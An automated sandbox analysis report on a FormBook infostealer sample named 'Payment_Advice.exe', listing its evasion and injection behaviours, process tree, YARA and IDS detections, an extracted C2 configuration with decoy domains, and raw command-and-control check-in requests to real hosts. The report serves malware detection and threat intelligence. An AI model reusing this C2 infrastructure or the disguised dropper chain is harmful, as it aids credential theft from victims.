
Windows Analysis Report
Payment_Advice.exe

Overview

General Information

Sample Name: Payment_Advice.exe
Analysis ID: 1320960
MD5: 15b3674e7fe8c5fe5284bc290a09ecb8
SHA1: 222c994082583413a9ea054eaf41583712702a53
SHA256: eb53ed1886ae853bdeb51270964242b2b03373388e65acc012c8fe0485b81514
Tags: exe, Formbook, Payment

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM autoit script
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Sample uses process hollowing technique
Writes to foreign memory regions
Modifies the prolog of user mode functions (user mode inline hooks)
Contains functionality to modify clipboard data
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found API chain indicative of sandbox detection
Found decision node followed by non-executed suspicious APIs
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality to simulate keystroke presses
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

  • System is w10x64
  • Payment_Advice.exe (PID: 1288 cmdline: C:\Users\user\Desktop\Payment_Advice.exe MD5: 15B3674E7FE8C5FE5284BC290A09ECB8)
    • wscript.exe (PID: 6152 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pis-e.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2564 cmdline: "C:\Windows\System32\cmd.exe" /c ewdbwwfpdh.bmp fjrpidauk.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ewdbwwfpdh.bmp (PID: 6052 cmdline: ewdbwwfpdh.bmp fjrpidauk.jpg MD5: 874798CB576E238642281B10189B031C)
          • RegSvcs.exe (PID: 4136 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • RegSvcs.exe (PID: 6108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
              • cmd.exe (PID: 636 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • cmd.exe (PID: 4424 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3352 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 3232 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup
Source | Rule | Description | Author
00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
Source | Rule | Description | Author
14.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
14.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
14.2.RegSvcs.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
14.2.RegSvcs.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
14.2.RegSvcs.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          No Sigma rule has matched
Timestamp: 10/06/23-15:46:24.770092
Source IP: 192.168.2.8
Destination IP: 142.234.186.98
SID: 2031412
Source Port: 49713
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/06/23-15:47:05.527481
Source IP: 192.168.2.8
Destination IP: 170.33.13.246
SID: 2031412
Source Port: 49714
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/06/23-15:48:47.739146
Source IP: 192.168.2.8
Destination IP: 75.2.115.196
SID: 2031412
Source Port: 49721
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/06/23-15:47:26.584409
Source IP: 192.168.2.8
Destination IP: 91.195.240.19
SID: 2031412
Source Port: 49715
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/06/23-15:48:06.495640
Source IP: 192.168.2.8
Destination IP: 66.96.160.140
SID: 2031412
Source Port: 49719
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/06/23-15:46:05.442049
Source IP: 192.168.2.8
Destination IP: 77.222.40.147
SID: 2031412
Source Port: 49711
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/06/23-15:47:46.016751
Source IP: 192.168.2.8
Destination IP: 62.72.50.244
SID: 2031412
Source Port: 49716
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/06/23-15:48:27.268039
Source IP: 192.168.2.8
Destination IP: 103.224.182.242
SID: 2031412
Source Port: 49720
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


          AV Detection

Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.jimenezfarmersinsurance.shop/hesf/"], "decoy": ["rizublog-aromama-a.com", "87b52.club", "allportablepower.com", "brownkrosshui.com", "schuobu.fun", "qevtjrobrb.xyz", "throne-rooms.com", "hostcheker.net", "buzztsunamiloja.com", "kkudatogel27.com", "91fulizifen.com", "148secretbet.com", "outlookthailand.com", "zonaduniabet.net", "boursobankk.com", "tuneuphypnosis.com", "sahabatzulhelmi.com", "usbulletinnow.com", "durdurdarshi.com", "zz-agency.com", "jf66899j.com", "artplex.store", "beautyhubaustralia.site", "tygyro.com", "ludio.biz", "ruochen.xyz", "smartvoiceinsurance.com", "shayun.net", "poston.app", "othersidewear.com", "620tom.com", "100mileview.info", "wedding-nanny.com", "betadda777.online", "passiveprofitsathome.com", "tobivausm.party", "171301.com", "sua-tang-chieu-cao-hiup.top", "pancakesandwaflesbeverages.net", "sahilsachdevaapps.app", "home-workout-ideas.com", "allpaleoclimb24.com", "vkcardrivingschool.com", "claimfine.com", "im-newbie-journal.online", "ybring7.com", "svgco.life", "joeysdoor.com", "elixirsiroptonic.com", "1320detailingsupplies.com", "olimcreative.com", "trinityoutboards.com", "zerofeelettings.com", "pendletonofficial.shop", "carneywaste.com", "schistdisc.com", "neomusic.net", "blackberrygrove.com", "homespy.net", "gdbushuo.icu", "luxury111mb.com", "akumaterial.com", "drakenskloof.com", "px6k4a.shop"]}
Source: Payment_Advice.exe | ReversingLabs: Detection: 44%
Source: Payment_Advice.exe | Virustotal: Detection: 48%
Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | ReversingLabs: Detection: 13%
Source: Payment_Advice.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Payment_Advice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Payment_Advice.exe
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 0000000F.00000002.3891932584.00000000122AF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842961223.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3848016870.0000000003C9F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1648193337.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1648028584.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1649872985.00000000035A6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1648104707.0000000001640000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842017169.0000000000A40000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1648193337.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, cmd.exe, 00000010.00000003.1648028584.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1649872985.00000000035A6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 0000000F.00000002.3891932584.00000000122AF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842961223.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3848016870.0000000003C9F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: cmd.pdb source: RegSvcs.exe, 0000000E.00000002.1648104707.0000000001640000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, cmd.exe, 00000010.00000002.3842017169.0000000000A40000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0050A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0051C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0052B348 FindFirstFileExA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001E65F1 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001AC642 FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001E7248 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A5589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A54EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A50207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A63E66 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_00A4532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_004172CE 4x nop then pop esi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00407B1A 4x nop then pop ebx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00417CFF 4x nop then pop edi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00417CB6 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_02B672CE 4x nop then pop esi
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_02B57B1A 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_02B67CB6 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_02B67CFF 4x nop then pop edi

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 77.222.40.147 80
Source: C:\Windows\explorer.exe | Network Connect: 66.96.160.140 80
Source: C:\Windows\explorer.exe | Network Connect: 170.33.13.246 80
Source: C:\Windows\explorer.exe | Network Connect: 142.234.186.98 80
Source: C:\Windows\explorer.exe | Network Connect: 103.224.182.242 80
Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.19 80
Source: C:\Windows\explorer.exe | Network Connect: 62.72.50.244 80
Source: C:\Windows\explorer.exe | Network Connect: 75.2.115.196 80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49711 -> 77.222.40.147:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49713 -> 142.234.186.98:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49714 -> 170.33.13.246:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49715 -> 91.195.240.19:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49716 -> 62.72.50.244:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49719 -> 66.96.160.140:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49720 -> 103.224.182.242:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49721 -> 75.2.115.196:80
Source: Malware configuration extractor | URLs: www.jimenezfarmersinsurance.shop/hesf/
Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.othersidewear.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.91fulizifen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.shayun.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.brownkrosshui.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=p36eIKN5Lwa/8BGKFMSG6AYkxDDJkwu9kGEjCpPHv7kROoaFrm0HZc0Jy9RwJeFaeZw5&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.usbulletinnow.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.im-newbie-journal.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.tygyro.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx HTTP/1.1 | Host: www.87b52.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: SWEB-ASRU
Source: Joe Sandbox View | ASN Name: BIZLAND-SDUS
Source: Joe Sandbox View | IP Address: 75.2.115.196
Source: explorer.exe, 0000000F.00000003.2284163967.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.0000000009255000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: explorer.exe, 0000000F.00000003.2284163967.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.0000000009255000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000F.00000003.2284163967.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.0000000009237000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 0000000F.00000002.3850139219.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1587254963.0000000004405000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 0000000F.00000003.2284163967.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.0000000009255000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000F.00000002.3856158250.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
